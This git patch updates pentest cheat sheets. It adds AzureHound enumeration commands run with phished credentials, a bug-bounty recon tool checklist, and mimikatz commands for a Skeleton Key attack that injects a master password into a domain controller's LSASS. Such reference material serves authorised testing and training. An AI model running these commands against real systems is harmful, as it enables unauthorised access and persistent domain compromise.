From b7043cfedde98e92ab158e2240bfbc2d34a3f9e1 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 16 Oct 2022 00:27:47 +0200 Subject: [PATCH] Bug Hunting Methodology Update --- .../Cloud - Azure Pentest.md | 19 ++++++++++++++++++- .../Methodology and enumeration.md | 12 +++++++++++- .../Windows - Persistence.md | 8 +++++++- 3 files changed, 36 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 7055f84..348e3be 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -95,7 +95,24 @@ ./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com" ./azurehound -a "6b5adee8-..." -s "" --tenant "contoso.onmicrosoft.com" list ./azurehound -j "ey..." --tenant "contoso.onmicrosoft.com" list az-ad - ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list + ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users + + # List of collections + az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default. + az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information. + + apps: Collects AzureAD application registration objects. + devices: Collects AzureAD devices regardless of join type. + groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible. + key-vaults: Collects AzureRM key vaults. + management-groups: Collects AzureRM management group objects + resource-groups: Collects AzureRM resource group objects + roles: Collects AzureAD admin role objects + service-principals: Collects AzureAD service principals + subscriptions: Collevts AzureRM subscriptions + tenants: Collevts AzureAD tenant objects + users: Collects AzureAD users, including any guest users in the target tenant. + virtual-machines: Collects AzureRM virtual machines # GUI access bolt://localhost:7687 diff --git a/Methodology and Resources/Methodology and enumeration.md b/Methodology and Resources/Methodology and enumeration.md index e0bd4f2..5a07049 100644 --- a/Methodology and Resources/Methodology and enumeration.md +++ b/Methodology and Resources/Methodology and enumeration.md @@ -47,12 +47,17 @@ ### Network discovery * Subdomains enumeration - * [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` + * Enumerate already found subdomains: [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` + * Permutate subdomains: [infosec-au/altdns](https://github.com/infosec-au/altdns) + * Bruteforce subdomains: [Josue87/gotator](https://github.com/Josue87/gotator) + * Subdomain takeovers: [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) * Network discovery * Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu) * Discover services, version and banners +* Review latest acquisitions + * ASN enumeration * [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent` @@ -69,6 +74,11 @@ ### Web discovery +* Locate `robots.txt` file +* Retrieve comments in source code +* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls) +* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) + * List all the subdirectories and files with `gobuster` or `ffuf` ```ps1 # gobuster -w wordlist -u URL -t threads diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 33352ec..5793abc 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -478,8 +478,14 @@ mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt ### Skeleton Key +> Inject a master password into the LSASS process of a Domain Controller. + +Requirements: +* Domain Administrator (SeDebugPrivilege) or `NTAUTHORITY\SYSTEM` + ```powershell -# Exploitation Command runned as DA: +# Execute the skeleton key attack +mimikatz "privilege::debug" "misc::skeleton" Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName # Access using the password "mimikatz"